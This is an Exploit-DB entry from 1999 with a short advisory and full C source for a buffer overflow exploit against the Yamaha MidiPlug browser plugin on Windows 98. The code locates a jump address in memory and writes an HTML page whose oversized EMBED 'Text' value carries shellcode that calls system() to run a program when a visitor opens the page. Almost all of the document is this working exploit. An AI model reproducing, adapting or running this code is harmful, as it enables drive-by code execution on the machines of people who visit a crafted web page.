Yamaha MidiPlug 1.1 b-j MidiPlug - Local Buffer Overflow

EDB-ID:

19585


Author:

UNYUN

Type:

local


Platform:

Windows

Date:

1999-11-02


// source: https://www.securityfocus.com/bid/760/info

There is a buffer overflow in the MidiPlug that may allow arbitrary code to be executed on the local host. This overflow occurs if a long "Text" variable is specified within an EMBED tag in a web page. Instructions in the text variable may be executed when a user visits the malicious web page.

/*=============================================================================
   YAMAHA MidiPLUG 1.10b-j for Windows98 IE4.0/5.0 exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================
*/

#include    <stdio.h>
#include    <windows.h>

#define     MAXBUF          700
#define     RETADR          256

unsigned int mems[]={
0xbfe30000,0xbfe43000,0xbfe80000,0xbfe86000,
0xbfe90000,0xbfe96000,0xbfea0000,0xbfeb0000,
0xbfee0000,0xbfee5000,0xbff20000,0xbff47000,
0xbff50000,0xbff61000,0xbff70000,0xbffc6000,
0xbffc9000,0xbffe3000,0,0};

unsigned char exploit_code[200]={
0x90,0xEB,0x50,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x90,0x88,0x23,0xB8,0x50,0x57,0xF7,0xBF,0x80,
0xc4,0x20,0xFF,0xD0,0x43,0x90,0xB2,0xE0,0x90,0x28,
0x13,0x28,0x53,0x01,0x28,0x53,0x02,0x28,0x53,0x03,
0x28,0x53,0x04,0x28,0x53,0x05,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x90,0x88,0x23,0xB8,0x28,0x4E,0xF7,
0xBF,0x80,0xc4,0x20,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x90,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x90,0xEB,0xFD,0xE8,0xAB,0xFF,0xFF,0xFF,0x00
};

unsigned char cmdbuf[200]="MSVCRT.DLL.SYSTEM.WELCOME.EXE";

unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
                unsigned char c1,unsigned char c2)
{
    unsigned char   *p;
    unsigned int    adr;

    for (p=st;p<ed;p++)
        if (*p==c1 && *(p+1)==c2){
            adr=(unsigned int)p;
            if ((adr&0xff)==0) continue;
            if (((adr>>8)&0xff)==0) continue;
            if (((adr>>16)&0xff)==0) continue;
            if (((adr>>24)&0xff)==0) continue;
            return(adr);
        }
    return(0);

}
main(int argc,char *argv[])
{
    FILE                    *fp;
    unsigned int            i,ip;
    unsigned char           buf[MAXBUF];

    if (argc<2){
        printf("usage %s output_htmlfile\n",argv[0]);
        exit(1);
    }
    if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE;
    fprintf(fp,"<HTML><EMBED\nTYPE=\"audio/midi\"\nWIDTH=150\nHEIGHT=40\nAUTOSTART=TRUE\nTEXT=\"");
    for (i=0;;i+=2){
        if (mems[i]==0){
            printf("Can not find jmp code.\n");
            exit(1);
        }
        if ((ip=search_mem(fp,(unsigned char *)mems[i],
            (unsigned char *)mems[i+1],0xff,0xe0))!=0) break;
    }
    printf("Jumping address : %x\n",ip);
    memset(buf,0x90,MAXBUF);
    buf[RETADR  ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    strcat(exploit_code,cmdbuf);
    memcpy(buf,exploit_code,strlen(exploit_code));
    buf[MAXBUF]=0;
    fprintf(fp,"%s\"\n>\n</HTML>",buf);
    fclose(fp);
    printf("%s created.\n",argv[1]);
    return FALSE;
}